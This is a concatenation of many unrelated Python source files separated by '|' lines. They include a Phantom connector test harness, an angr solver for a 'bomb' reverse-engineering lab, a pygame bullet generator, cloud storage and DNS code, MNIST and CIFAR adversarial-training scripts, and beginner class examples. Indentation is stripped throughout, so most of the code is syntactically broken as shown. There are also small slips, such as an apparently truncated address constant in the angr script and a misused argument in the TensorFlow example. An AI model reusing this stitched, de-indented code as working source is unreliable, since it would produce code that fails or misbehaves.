return phantom.APP_SUCCESS
if __name__ == '__main__':
import argparse
import sys
import pudb
pudb.set_trace()
argparser = argparse.ArgumentParser()
argparser.add_argument('input_test_json', help='Input Test JSON file')
argparser.add_argument('-u', '--username', help='username', required=False)
argparser.add_argument('-p', '--password', help='password', required=False)
argparser.add_argument('-v', '--verify', action='store_true', help='verify', required=False, default=False)
args = argparser.parse_args()
session_id = None
username = args.username
password = args.password
verify = args.verify
if username is not None and password is None:
# User specified a username but not a password, so ask
import getpass
password = getpass.getpass("Password: ")
if username and password:
try:
login_url = TalaConnector._get_phantom_base_url() + '/login'
print("Accessing the Login page")
r = requests.get(login_url, verify=verify, timeout=60)
csrftoken = r.cookies['csrftoken']
data = dict()
data['username'] = username
data['password'] = password
data['csrfmiddlewaretoken'] = csrftoken
headers = dict()
headers['Cookie'] = 'csrftoken=' + csrftoken
headers['Referer'] = login_url
print("Logging into Platform to get the session id")
r2 = requests.post(login_url, verify=verify, data=data, headers=headers, timeout=60)
session_id = r2.cookies['sessionid']
except Exception as e:
print("Unable to get session id from the platfrom. Error: " + str(e))
sys.exit(1)
with open(args.input_test_json) as f:
in_json = f.read()
in_json = json.loads(in_json)
print(json.dumps(in_json, indent=4))
connector = TalaConnector()
connector.print_progress_message = True
if session_id is not None:
in_json['user_session_token'] = session_id
connector._set_csrf_info(csrftoken, headers['Referer'])
ret_val = connector._handle_action(json.dumps(in_json), None)
print(json.dumps(json.loads(ret_val), indent=4))
sys.exit(0)
|
import angr
BEFORE_STRINGS_NOT_EQUAL_ADDR = 0x8048B2C
FIND_ADDR = 0x8048B43
AVOID_ADDR = 0x8048B3
# Load the binary
proj = angr.Project('bomb', load_options={'auto_load_libs':False})
# Start right before the data comes in:
state = proj.factory.blank_state(addr=BEFORE_STRINGS_NOT_EQUAL_ADDR)
# Approach 1 - create an input string, and put a reference to it in eax.
# a symbolic input string with a length up to 32 bytes
input_string = state.se.BVS("input_string", 8 * 32)
HARDCODED_ADDRESS = 0xd0000010
state.memory.store(HARDCODED_ADDRESS, input_string)
state.regs.eax = HARDCODED_ADDRESS
# Create a path group
path_group = proj.factory.path_group(state)
# Step until the explorer finds one of the addresses we are looking for or all paths are deadended
path_group.explore(find=FIND_ADDR, avoid=AVOID_ADDR)
solution_path = path_group.found[0]
solution_state = solution_path.state
print solution_state.se.any_str(input_string).rstrip(chr(0))
# Prints: 'Public speaking is very easy.'
|
import pygame,sys
import random
import math
from pygame.locals import *
from pygame.sprite import Group
import gF
import Bullet
import Slave
import global_var
import Effect
import Item
def polyByLength(bullets,type,length,sideNum,standardSpeed,standardAngle,pos,color='white',doCode=False,*args):
halfAngle=360/sideNum/2
counterAngle=90-halfAngle
wholeAngle=halfAngle*2
w=standardSpeed/math.sin(math.radians(counterAngle))
sideLength=2*math.tan(halfAngle/180*math.pi)*standardSpeed
for i in range(0,sideNum):
for j in range(0,length):
new_bullet=type(*args)
#print(new_bullet)
unitLength=sideLength/length
dLength=j*unitLength
dFromCenter=dLength-(sideLength/2)
speed=math.sqrt(standardSpeed**2+dFromCenter**2)
sinValue=math.sin(math.radians(counterAngle))*dLength/speed
insideAngle=(math.asin(sinValue)/math.pi*180)
if math.sqrt(w**2+speed**2)<dLength:
insideAngle=180-insideAngle
angle=standardAngle+wholeAngle*i+insideAngle
new_bullet.initial(pos[0],pos[1],1)
if not doCode:
new_bullet.loadColor(color)
else:
new_bullet.doColorCode(color)
new_bullet.setSpeed(angle,speed)
bullets.add(new_bullet)
#print(i,' ',j)
|
from FSMSIM.expr.expr import Expr
class ConcatExpr(Expr):
def __init__(self, l: Expr, r: Expr) -> None:
self.l = l
self.r = r
def evaluate(self) -> str:
return self.l.evaluate() + self.r.evaluate()
def __len__(self) -> int:
return len(self.l) + len(self.r)
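# Usage sketch (illustrative only; `_Lit` is a hypothetical leaf Expr, not part of FSMSIM):
#
#     class _Lit(Expr):
#         def __init__(self, s: str) -> None:
#             self.s = s
#         def evaluate(self) -> str:
#             return self.s
#         def __len__(self) -> int:
#             return len(self.s)
#
#     ConcatExpr(_Lit("ab"), _Lit("cd")).evaluate()  # -> "abcd", and len(...) == 4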
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import pulumi
import pulumi.runtime
class GetManagedZoneResult(object):
"""
A collection of values returned by getManagedZone.
"""
def __init__(__self__, description=None, dns_name=None, name_servers=None, id=None):
if description and not isinstance(description, basestring):
raise TypeError('Expected argument description to be a basestring')
__self__.description = description
"""
A textual description field.
"""
if dns_name and not isinstance(dns_name, basestring):
raise TypeError('Expected argument dns_name to be a basestring')
__self__.dns_name = dns_name
"""
The fully qualified DNS name of this zone, e.g. `terraform.io.`.
"""
if name_servers and not isinstance(name_servers, list):
raise TypeError('Expected argument name_servers to be a list')
__self__.name_servers = name_servers
"""
The list of nameservers that will be authoritative for this
domain. Use NS records to redirect from your DNS provider to these names,
thus making Google Cloud DNS authoritative for this zone.
"""
if id and not isinstance(id, basestring):
raise TypeError('Expected argument id to be a basestring')
__self__.id = id
"""
id is the provider-assigned unique ID for this managed resource.
"""
def get_managed_zone(name=None, project=None):
"""
Provides access to a zone's attributes within Google Cloud DNS.
For more information see
[the official documentation](https://cloud.google.com/dns/zones/)
and
[API](https://cloud.google.com/dns/api/v1/managedZones).
```hcl
data "google_dns_managed_zone" "env_dns_zone" {
name = "qa-zone"
}
resource "google_dns_record_set" "dns" {
name = "my-address.${data.google_dns_managed_zone.env_dns_zone.dns_name}"
type = "TXT"
ttl = 300
managed_zone = "${data.google_dns_managed_zone.env_dns_zone.name}"
rrdatas = ["test"]
}
```
"""
__args__ = dict()
__args__['name'] = name
__args__['project'] = project
__ret__ = pulumi.runtime.invoke('gcp:dns/getManagedZone:getManagedZone', __args__)
return GetManagedZoneResult(
description=__ret__.get('description'),
dns_name=__ret__.get('dnsName'),
name_servers=__ret__.get('nameServers'),
id=__ret__.get('id'))
|
def ping() -> str:
return "pong"
|
import os
import sys
import logging
from pathlib import Path
import importlib
import boto3
from botocore.exceptions import ClientError
import timone
from timone.errors import StorageException
class StorageDriver(object):
def __init__(self):
        super().__init__()
def object_exists(self, org, repo, oid):
return False
def get_object_upload_url(self, org, repo, oid):
return None
def get_object_download_url(self, org, repo, oid):
return None
def get_object_uri(self, org, repo, oid):
return Path(org) / Path(repo) / oid[:2] / oid[2:4] / oid
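    # Example (hypothetical values): get_object_uri("acme", "repo1", "ab12cd34ef")
    # -> Path("acme/repo1/ab/12/ab12cd34ef"), a two-level fan-out keyed on the
    # first four characters of the oid.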
def get_object_path(self, org, repo, oid, mkdir=False):
return self.get_object_uri(org, repo, oid)
class StorageDriverFactory(object):
@staticmethod
def get_storage():
# loading the storage system to use
try:
storage = getattr(
importlib.import_module("timone.storage"),
os.getenv("TIMONE_STORAGE", timone.DEFAULT_STORAGE),
)
return storage
except AttributeError as ex:
logging.error(
"Cannot find storage driver: {}.".format(os.getenv("TIMONE_STORAGE"))
)
sys.exit(-1)
class DumbStorageDriver(StorageDriver):
def __init__(self):
        super().__init__()
# this is purely for testing
self.endpoint = os.getenv("TIMONE_ENDPOINT_URL", timone.DEFAULT_ENDPOINT_URL)
def object_exists(self, org, repo, oid):
logging.debug("org: {} repo: {} object: {}.".format(org, repo, oid))
return True
def get_object_upload_url(self, org, repo, oid):
return "{}/{}/{}/object/{}".format(self.endpoint, org, repo, oid)
def get_object_download_url(self, org, repo, oid):
return "{}/{}/{}/object/{}".format(self.endpoint, org, repo, oid)
class S3StorageDriver(StorageDriver):
def __init__(self):
self.client = boto3.client(
"s3",
endpoint_url=os.getenv("TIMONE_STORAGE_S3_URL"),
region_name=os.getenv("TIMONE_STORAGE_S3_REGION"),
aws_access_key_id=os.getenv("TIMONE_STORAGE_S3_KEY"),
aws_secret_access_key=os.getenv("TIMONE_STORAGE_S3_SECRET"),
)
def object_exists(self, org, repo, oid):
try:
uri = str(self.get_object_uri(org, repo, oid))
obj_list = self.client.list_objects_v2(
Bucket=os.getenv("TIMONE_STORAGE_S3_BUCKET"), Prefix=uri
)
for obj in obj_list.get("Contents", []):
if obj["Key"] == uri:
return True
except ClientError as ex:
raise StorageException(org, repo, oid, "object_exists", str(ex))
return False
def get_object_upload_url(self, org, repo, oid):
try:
url = self.client.generate_presigned_url(
"put_object",
Params={
"Bucket": os.getenv("TIMONE_STORAGE_S3_BUCKET"),
"Key": str(self.get_object_uri(org, repo, oid)),
},
ExpiresIn=int(
os.getenv(
"TIMONE_OBJECT_EXPIRESIN", timone.DEFAULT_OBJECT_EXPIRESIN
)
),
)
return url
except ClientError as ex:
raise StorageException(org, repo, oid, "get_object_upload_url", str(ex))
def get_object_download_url(self, org, repo, oid):
try:
url = self.client.generate_presigned_url(
"get_object",
Params={
"Bucket": os.getenv("TIMONE_STORAGE_S3_BUCKET"),
"Key": str(self.get_object_uri(org, repo, oid)),
},
ExpiresIn=int(
os.getenv(
"TIMONE_OBJECT_EXPIRESIN", timone.DEFAULT_OBJECT_EXPIRESIN
)
),
)
return url
except ClientError as ex:
raise StorageException(org, repo, oid, "get_object_download_url", str(ex))
|
# Random Forest Classifier
import sys
import numpy as np
import pickle
from sklearn import model_selection
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score, confusion_matrix
from MNIST_Dataset_Loader.mnist_loader import MNIST
import matplotlib.pyplot as plt
from matplotlib import style
style.use('ggplot')
old_stdout = sys.stdout
log_file = open("summary.log","w")
sys.stdout = log_file
print('\nLoading MNIST Data...')
# data = MNIST('./python-mnist/data/')
data = MNIST('./MNIST_Dataset_Loader/dataset/')
print('\nLoading Training Data...')
img_train, labels_train = data.load_training()
train_img = np.array(img_train)
train_labels = np.array(labels_train)
print('\nLoading Testing Data...')
img_test, labels_test = data.load_testing()
test_img = np.array(img_test)
test_labels = np.array(labels_test)
#Features
X = train_img
#Labels
y = train_labels
print('\nPreparing Classifier Training and Validation Data...')
X_train, X_test, y_train, y_test = model_selection.train_test_split(X,y,test_size=0.1)
print('\nRandom Forest Classifier with n_estimators = 100, n_jobs = 10')
print('\nPickling the Classifier for Future Use...')
clf = RandomForestClassifier(n_estimators=100, n_jobs=10)
clf.fit(X_train,y_train)
with open('MNIST_RFC.pickle','wb') as f:
pickle.dump(clf, f)
pickle_in = open('MNIST_RFC.pickle','rb')
clf = pickle.load(pickle_in)
print('\nCalculating Accuracy of trained Classifier...')
confidence = clf.score(X_test,y_test)
print('\nMaking Predictions on Validation Data...')
y_pred = clf.predict(X_test)
print('\nCalculating Accuracy of Predictions...')
accuracy = accuracy_score(y_test, y_pred)
print('\nCreating Confusion Matrix...')
conf_mat = confusion_matrix(y_test,y_pred)
print('\nRFC Trained Classifier Confidence: ',confidence)
print('\nPredicted Values: ',y_pred)
print('\nAccuracy of Classifier on Validation Image Data: ',accuracy)
print('\nConfusion Matrix: \n',conf_mat)
# Plot Confusion Matrix Data as a Matrix
plt.matshow(conf_mat)
plt.title('Confusion Matrix for Validation Data')
plt.colorbar()
plt.ylabel('True label')
plt.xlabel('Predicted label')
plt.show()
print('\nMaking Predictions on Test Input Images...')
test_labels_pred = clf.predict(test_img)
print('\nCalculating Accuracy of Trained Classifier on Test Data... ')
acc = accuracy_score(test_labels,test_labels_pred)
print('\n Creating Confusion Matrix for Test Data...')
conf_mat_test = confusion_matrix(test_labels,test_labels_pred)
print('\nPredicted Labels for Test Images: ',test_labels_pred)
print('\nAccuracy of Classifier on Test Images: ',acc)
print('\nConfusion Matrix for Test Data: \n',conf_mat_test)
# Plot Confusion Matrix for Test Data
plt.matshow(conf_mat_test)
plt.title('Confusion Matrix for Test Data')
plt.colorbar()
plt.ylabel('True label')
plt.xlabel('Predicted label')
plt.axis('off')
plt.show()
sys.stdout = old_stdout
log_file.close()
# Show the Test Images with Original and Predicted Labels
a = np.random.randint(1,30,10)
for i in a:
two_d = (np.reshape(test_img[i], (28, 28)) * 255).astype(np.uint8)
plt.title('Original Label: {0} Predicted Label: {1}'.format(test_labels[i],test_labels_pred[i]))
plt.imshow(two_d, interpolation='nearest',cmap='gray')
plt.show()
#------------------------- EOC -----------------------------
|
# https://docs.aws.amazon.com/rekognition/latest/dg/API_IndexFaces.html
import boto3
#BUCKET = "amazon-rekognition"
BUCKET = "smart-door-image-store"
KEY = "ted_pic.jpg" # Either key in S3 or however img frame gets passed from KVS
IMAGE_ID = KEY
COLLECTION = "faces"
REGION = "us-east-1"
# Collection is already created, but if it wasn't we can uncomment
# this to create it:
# rekognition.create_collection(CollectionId=COLLECTION)
def index_faces(bucket, key, collection_id, image_id=None, attributes=(), region=REGION):
rekognition = boto3.client("rekognition", region)
response = rekognition.index_faces(
Image={
"S3Object": {
"Bucket": bucket,
"Name": key,
}
},
CollectionId=collection_id,
ExternalImageId=image_id,
DetectionAttributes=attributes,
)
return response['FaceRecords']
for record in index_faces(BUCKET, KEY, COLLECTION, IMAGE_ID):
face = record['Face']
#print(face)
# details = record['FaceDetail']
print("Face ({}%)".format(face['Confidence']))
print(" FaceId: {}".format(face['FaceId']))
print(" ImageId: {}".format(face['ImageId']))
"""
Expected output:
Face (99.945602417%)
FaceId: dc090f86-48a4-5f09-905f-44e97fb1d455
ImageId: f974c8d3-7519-5796-a08d-b96e0f2fc242
"""
|
#!/usr/bin/env python
# coding: utf-8
import os
import pathlib
from io import StringIO
from unittest import TestCase
from sampan.toto import get_samples
class TestToto(TestCase):
TEST_CSV_FILE = os.path.join(str(pathlib.Path(__file__).parent), 'resources', 'test.csv')
def test_get_samples(self):
get_samples(self.TEST_CSV_FILE)
|
import _lib
import re
import time
def StartNodeInteractive(datadir, address, port,comment = ""):
_lib.StartTest("Start node (debug) "+comment)
res = _lib.ExecuteHangNode(['startintnode','-datadir',datadir,'-port',port,'-minter',address],datadir)
_lib.FatalAssertSubstr(res,"Process started","No process start marker")
def GetWallets(datadir):
_lib.StartTest("Get node wallets")
res = _lib.ExecuteNode(['listaddresses','-datadir',datadir])
_lib.FatalAssertSubstr(res,"Wallets (addresses)","No list of wallets")
regex = ur"(1[a-zA-Z0-9]{30,100})"
addresses = re.findall(regex, res)
return addresses
def NodeState(datadir):
_lib.StartTest("Check node state")
res = _lib.ExecuteNode(['nodestate','-datadir',datadir])
_lib.FatalAssertSubstr(res,"Number of blocks","No info about blocks")
state = {}
match = re.search( r'Number of blocks - (\d+)', res)
if not match:
_lib.Fatal("Number of blocks is not found "+res)
state['blocks'] = match.group(1)
match = re.search( r'Number of unapproved transactions - (\d+)', res)
if not match:
_lib.Fatal("Numberof unapproved transactions not found "+res)
state['unapproved'] = match.group(1)
match = re.search( r'Number of unspent transactions outputs - (\d+)', res)
if not match:
_lib.Fatal("Number of unspent transactions outputs - not found "+res)
state['unspent'] = match.group(1)
state['inprogress'] = False
match = re.search( r'Loaded (\d+) of (\d+) blocks', res)
if match:
state['totalnumber'] = match.group(2)
state['inprogress'] = True
return state
def WaitBlocksInState(datadir, explen, maxtime = 10):
i = 0
while True:
state = NodeState(datadir)
if int(state['blocks']) >= explen or i >= maxtime:
break
time.sleep(1)
i = i + 1
return state
|
from chatbot.models import Survey
def test_database(test_session):
"""Tests that the mock database was set up correctly"""
# execute
surveys = test_session.query(Survey).all()
# validation
assert len(surveys) == 2
for survey in surveys:
assert survey.name in ["survey1", "survey2"]
assert len(survey.responses) == 2
assert survey.questions.count() == 3 # needs count() b/c dynamic load
assert survey.created_date is not None
|
v = [9, 8, 7, 12, 0, 13, 21]
p = []
i = []
for x in v:
if x % 2 == 0:
p.append(x)
else:
i.append(x)
print(f'Even numbers: {p}')
print(f'Odd numbers: {i}')
|
import numpy as np
import tensorflow as tf
from gtrain import FCNet, gtrain
from gtrain.data import AllData
np.random.seed(555)
tf.set_random_seed(555)
def generate_test_data(num_of_train_samples=1000, num_of_validation_samples=100):
data_tr = np.random.rand(num_of_train_samples, 2)
data_val = np.random.rand(num_of_validation_samples, 2)
l_tr = np.zeros([num_of_train_samples, 3])
l_val = np.zeros([num_of_validation_samples, 3])
def sample_class(sample):
if (sample[0] * sample[0] + sample[1] * sample[1]) < 0.0:
return 0
else:
if sample[1] > 0.5:
return 1
else:
return 2
for i in range(len(l_tr)):
l_tr[i][sample_class(data_tr[i])] = 1
for i in range(len(l_val)):
l_val[i][sample_class(data_val[i])] = 1
return data_tr, l_tr, data_val, l_val
layer_input_sizes = 2
num_of_samples = 1000
num_of_classes = 3
data_tr, l_tr, data_val, l_val = generate_test_data(num_of_samples, num_of_classes)
# initialization of weights
inner_dimensions = [layer_input_sizes, 3, num_of_classes]
train_net = FCNet(inner_dimensions, use_cross_entropy=False)
data = AllData(data_tr, l_tr, data_val, l_val)
gtrain(train_net, data, num_steps=10000, evaluate_every=1000, checkpoint_every=1000, num_checkpoints=5)
|
# create a class and __init__
class Book():
pass
book = Book()
print(book) # we get <__main__.Book object at 0x7fe3b9636a60>
# When we say Book() we are instantiating a new object
# This object is assigned to the book variable
# Printing it gives us the type and memory location
# second method:
print(type(book)) # we get <class '__main__.Book'>
# Then...
class Book():
def __init__(self, title):
self.title = title
# consider this the constructor, or the function that is invoked when we create a book.
# self refers to the book being created
# and we don't have to worry about passing that, it's implicit...
# Title is passed in as an argument, and assigned to self.title (the title of the book)
# methods
class Book():
def __init__ (self, title, pages):
self.title = title
self.pages = pages
def log(self):
print(f"{self.title} is {self.pages} pages long.")
def is_short(self):
if self.pages < 100:
return True
book = Book("are you my mother", 72)
book.log()
# prints out: are you my mother is 72 pages long.
# class level variables
# self refers to the object things are being invoked on,
# When we create an object. __init__ assigns stuff to self
# That allows each object to have attributes.
class Book():
favs = [] # class
def __init__ (self, title, pages):
self.title = title
self.pages = pages
def log(self):
print(f"{self.title} is {self.pages} pages long.")
def is_short(self):
if self.pages < 100:
return True
book = Book("are you my mother?", 72) # title and number of pages
book2 = Book("The Digging-est Dog", 72)
Book.favs.append(book) # add books to the list
Book.favs.append(book2)
print(Book.favs)
# To save space we are combining the code for all three of these sections.
class Book():
favs = [] # class
def __init__(self, title, pages):
self.title = title
self.pages = pages
def is_short(self):
if self.pages < 100:
            return True
#What happens when you pass object to print?
def __str__(self):
return f"{self.title}, {self.pages} pages long"
#What happens when you use ==?
def __eq__(self, other):
if(self.title == other.title and self.pages == other.pages):
return True
    # It's appropriate to give something for __hash__ when you override __eq__.
    # This is the recommended way if the object is mutable (like it is here):
    __hash__ = None
    # If it should be immutable, you could do something like this instead
    # (this replaces __hash__ = None):
def __hash__(self):
# xor with hash of attributes
return hash(self.title) ^ hash(self.pages)
#from Mastering Object-Oriented Python
book = Book("Are You My Mother", 72)
print(book)
equal_book = Book("Are You My Mother", 72)
print("Are they considered equal?", book == equal_book) # yep
print("Are they the same object?", book is equal_book) # nope
book2 = Book("The Digging-est Dog", 72)
print(hash(book), hash(book2))
print("old hash", hash(book))
book.title = "new"
print("new hash", hash(book)) # BAD!!!
#Hashes shouldn't change
|
from bs4 import BeautifulSoup
import sys
from prep.helpers import HttpHelpers
class iJobs:
def __init__(self, url):
self.url = url
self.helpers = HttpHelpers()
def get(self):
page = self.helpers.download_page(self.url)
if page is None:
sys.exit('Error downloading webpage')
indeed_jobs = self.__parse_index(page)
return indeed_jobs
def __parse_index(self, htmlcontent):
soup = BeautifulSoup(htmlcontent, 'lxml')
jobs_container = soup.find(id='resultsCol')
job_items = jobs_container.find_all('div', class_='jobsearch-SerpJobCard')
if job_items is None or len(job_items) == 0:
return []
all_jobs = []
for job_elem in job_items:
url_elem = job_elem.find('a', class_='jobtitle')
title_elem = job_elem.find('a', class_='jobtitle')
company_elem = job_elem.find('span', class_='company')
loc_elem = job_elem.find('span', class_='location')
if None in (title_elem, company_elem, url_elem, loc_elem):
continue
href = url_elem.get('href')
if href is None:
continue
item = {
"title" : title_elem.text.strip(),
"company" : company_elem.text.strip(),
"location" : loc_elem.text.strip(),
"href" : f'https://www.indeed.com{href}'
}
all_jobs.append(item)
return all_jobs
|
from rest_framework import status
from rest_framework.response import Response
from rest_framework.generics import GenericAPIView
from ..permissions import IsAuthenticated
from ..utils import readbuffer, decrypt_with_db_secret
from ..app_settings import (
ReadHistorySerializer
)
from ..authentication import TokenAuthentication
class HistoryView(GenericAPIView):
authentication_classes = (TokenAuthentication, )
permission_classes = (IsAuthenticated,)
allowed_methods = ('GET', 'OPTIONS', 'HEAD')
def get(self, request, secret_history_id, *args, **kwargs):
"""
Returns a specific history item
Necessary Rights:
- read on secret
:param request:
:type request:
        :param secret_history_id:
        :type secret_history_id:
:param args:
:type args:
:param kwargs:
:type kwargs:
:return: 200 / 400
:rtype:
"""
serializer = ReadHistorySerializer(data=request.data, context=self.get_serializer_context())
if not serializer.is_valid():
return Response(
serializer.errors, status=status.HTTP_400_BAD_REQUEST
)
secret_history = serializer.validated_data.get('secret_history')
try:
callback_pass = decrypt_with_db_secret(secret_history.callback_pass)
except:
callback_pass = '' #nosec -- not [B105:hardcoded_password_string]
return Response({
'create_date': secret_history.create_date,
'write_date': secret_history.write_date,
'data': readbuffer(secret_history.data),
'data_nonce': secret_history.data_nonce if secret_history.data_nonce else '',
'type': secret_history.type,
'callback_url': secret_history.callback_url,
'callback_user': secret_history.callback_user,
'callback_pass': callback_pass,
}, status=status.HTTP_200_OK)
def put(self, *args, **kwargs):
return Response({}, status=status.HTTP_405_METHOD_NOT_ALLOWED)
def post(self, *args, **kwargs):
return Response({}, status=status.HTTP_405_METHOD_NOT_ALLOWED)
def delete(self, *args, **kwargs):
return Response({}, status=status.HTTP_405_METHOD_NOT_ALLOWED)
|
# Generate train/val file lists from single-path image folders
#
import numpy as np
import os
import random
from sklearn.model_selection import train_test_split
from matplotlib import pyplot as plt
import pickle
import cv2
train_X = []
train_y = []
# set folder path
'''
The benefit of doing it this way is that the folders do not have to be split into
train/val by hand, which matches how real projects are organized.
'''
folder_path1 = '/home/yao/data/hymenoptera_data/ants/'
folder_path2= '/home/yao/data/hymenoptera_data/bees/'
classes = ['ant','bee']
# Extra rule: enforce a minimum size; images smaller than min_size go into the test set only
min_size = 224
test_X = []
test_y = []
def cv2_load(path):
img = cv2.imdecode(np.fromfile(path,np.uint8),cv2.IMREAD_COLOR)
shape = img.shape
return img, shape
# load image arrays
for filename in os.listdir(folder_path1):
    if filename != '.DS_Store':  # useless hidden file created by macOS
        new_file_name = filename.replace(" ", "_")
        new_file_name = new_file_name.replace("（", "(")  # normalize full-width parentheses
        new_file_name = new_file_name.replace("）", ")")
imagepath = folder_path1 + filename
new_imagepath = folder_path1 + new_file_name
if (new_file_name != filename):
os.rename(imagepath, new_imagepath)
print(f'rename {imagepath} as {new_imagepath}')
_,shape = cv2_load(new_imagepath)
if shape[0] <min_size or shape[1]<min_size:
test_X.append(new_imagepath)
test_y.append(0)
else:
train_X.append(new_imagepath)
train_y.append(0)
else:
print(filename, 'not a pic')
# load image arrays
for filename in os.listdir(folder_path2):
    if filename != '.DS_Store':  # .DS_Store is a hidden file macOS uses to store custom folder attributes
        new_file_name = filename.replace(" ", "_")
        new_file_name = new_file_name.replace("（", "(")  # normalize full-width parentheses
        new_file_name = new_file_name.replace("）", ")")
imagepath = folder_path2 + filename
new_imagepath = folder_path2 + new_file_name
if (new_file_name != filename):
os.rename(imagepath, new_imagepath)
_,shape = cv2_load(new_imagepath)
if shape[0] <min_size or shape[1]<min_size:
test_X.append(new_imagepath)
test_y.append(1)
else:
train_X.append(new_imagepath)
train_y.append(1)
else:
print(filename, 'not a pic')
print('small size pic:', len(test_X))
X_train, X_test, y_train, y_test = train_test_split(train_X, train_y, test_size=0.3)
X_test.extend(test_X)
y_test.extend(test_y)
# move (unused draft below)
'''
cnt_label = [0,0]
for i in range(classes.__sizeof__()):
cnt_label[i]= np.sum(i == test_y)
for cnt ,i in enumerate(cnt_label,0):
pass
'''
count = len(X_train)
cls_train_cnt =np.array([0,0])
cls_test_cnt =np.array([0,0])
f = open('train.csv', 'w')
for i in range(count):
    line = '%s,%d' % (X_train[i], y_train[i])  # '%s,%d' is the format string; the % operator fills it in
cls_train_cnt[ y_train[i]] +=1
f.write(line)
if (i < count - 1):
f.write("\n")
f.close()
print('X_train: ', len(X_train))
print(' ant: ',cls_train_cnt[0])
print(' bee: ',cls_train_cnt[1])
print('Gen train.csv Done!')
count = len(X_test)
f = open('val.csv', 'w')
for i in range(count):
line = '%s,%d' % (X_test[i], y_test[i])
cls_test_cnt[ y_test[i]] +=1
f.write(line)
if (i < count - 1):
f.write("\n")
f.close()
print('X_test: ', len(X_test))
print(' ant: ',cls_test_cnt[0])
print(' bee: ',cls_test_cnt[1])
print('Gen val.csv Done!')
|
import pandas as pd
from faker.factory import Factory
from stop_watch import stop_watch  # execution-time measurement
# import json # To create a json file
from random import randint # For id
Faker = Factory.create
fake = Faker()
fake.seed(20000)  # setting a seed makes the generated results reproducible
fake = Faker("ja_JP")
@stop_watch
def make_data(use_columns, row_count):
return fake.csv(
header=None, data_columns=use_columns, num_rows=row_count, include_row_ids=False
)
def input_data(x):
test_data = {}
for i in range(0, x):
test_data[i] = {}
test_data[i]["id"] = randint(1, 100)
test_data[i]["name"] = fake.name()
test_data[i]["zipcode"] = fake.zipcode()
test_data[i]["address"] = fake.address()
test_data[i]["phone_number"] = fake.phone_number()
    return pd.DataFrame(test_data).T  # transpose and return
def main():
# Enter number of records
number_of_records = 10 # For the above task make this 100
use_columns = ["{{name}}", "{{zipcode}}", "{{address}}", "{{phone_number}}"]
# print(make_data(use_columns, number_of_records))
df = input_data(number_of_records)
print(df.head(10))
print(df.dtypes)
print(df["address"])
s = pd.Series(df["id"], dtype="uint8")
print(s.head(10))
print(s.dtypes)
main()
# If the commented-out json import above were used instead, a students.json file
# with the 10 generated records could be written next to this script.
|
from .light_frontend import LightFrontend
from .full_frontend import FullFrontend
from .hybrid_frontend import HybridFrontend
from .composite_frontend import CompositeFrontend
from .replacement_frontend import ReplacementFrontend
|
from __future__ import print_function
import os
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
import torch.optim as optim
from torchvision import datasets, transforms
from models.wideresnet import *
from models.resnet import *
from adv import adv_loss_new
parser = argparse.ArgumentParser(description='PyTorch CIFAR TRADES Adversarial Training')
parser.add_argument('--batch-size', type=int, default=128, metavar='N',
help='input batch size for training (default: 128)')
parser.add_argument('--test-batch-size', type=int, default=128, metavar='N',
help='input batch size for testing (default: 128)')
parser.add_argument('--epochs', type=int, default=76, metavar='N',
help='number of epochs to train')
parser.add_argument('--weight-decay', '--wd', default=2e-4,
type=float, metavar='W')
parser.add_argument('--lr', type=float, default=0.1, metavar='LR',
help='learning rate')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--epsilon', default=0.031,
help='perturbation')
parser.add_argument('--num-steps', default=10,
help='perturb number of steps')
parser.add_argument('--step-size', default=0.007,
help='perturb step size')
parser.add_argument('--beta', default=1.0,
help='regularization, i.e., 1/lambda in TRADES')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=100, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--model-dir', default='./model-cifar-wideResNet',
help='directory of model for saving checkpoint')
parser.add_argument('--save-freq', '-s', default=1, type=int, metavar='N',
help='save frequency')
parser.add_argument('--prob','-p', default=1, type=float)
args = parser.parse_args()
# settings
model_dir = args.model_dir
if not os.path.exists(model_dir):
os.makedirs(model_dir)
use_cuda = not args.no_cuda and torch.cuda.is_available()
torch.manual_seed(args.seed)
device = torch.device("cuda" if use_cuda else "cpu")
kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}
# setup data loader
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
])
trainset = torchvision.datasets.CIFAR10(root='../data', train=True, download=True, transform=transform_train)
train_loader = torch.utils.data.DataLoader(trainset, batch_size=args.batch_size, shuffle=False, **kwargs)
testset = torchvision.datasets.CIFAR10(root='../data', train=False, download=True, transform=transform_test)
test_loader = torch.utils.data.DataLoader(testset, batch_size=args.test_batch_size, shuffle=False, **kwargs)
def train(args, model, device, train_loader, optimizer, epoch, x_advs, perturb_prob):
model.train()
new_x_advs = []
for batch_idx, (data, target) in enumerate(train_loader):
data, target = data.to(device), target.to(device)
idx = torch.nonzero(torch.rand(data.shape[0], device=device)[:, None] < perturb_prob)[:, 0]
data = data.index_select(0, idx)
target = target.index_select(0, idx)
optimizer.zero_grad()
# calculate robust loss
loss, x_adv = adv_loss_new(model=model,
x_natural=data,
y=target,
optimizer=optimizer,
step_size=args.step_size,
epsilon=args.epsilon,
perturb_steps=args.num_steps,
beta=args.beta)
loss.backward()
optimizer.step()
new_x_adv = x_advs[batch_idx]
new_x_adv[idx] = x_adv
new_x_advs.append(new_x_adv)
# print progress
if batch_idx % args.log_interval == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.item()))
return new_x_advs
def eval_train(model, device, train_loader):
model.eval()
train_loss = 0
correct = 0
with torch.no_grad():
for data, target in train_loader:
data, target = data.to(device), target.to(device)
output = model(data)
train_loss += F.cross_entropy(output, target, size_average=False).item()
pred = output.max(1, keepdim=True)[1]
correct += pred.eq(target.view_as(pred)).sum().item()
train_loss /= len(train_loader.dataset)
print('Training: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)'.format(
train_loss, correct, len(train_loader.dataset),
100. * correct / len(train_loader.dataset)))
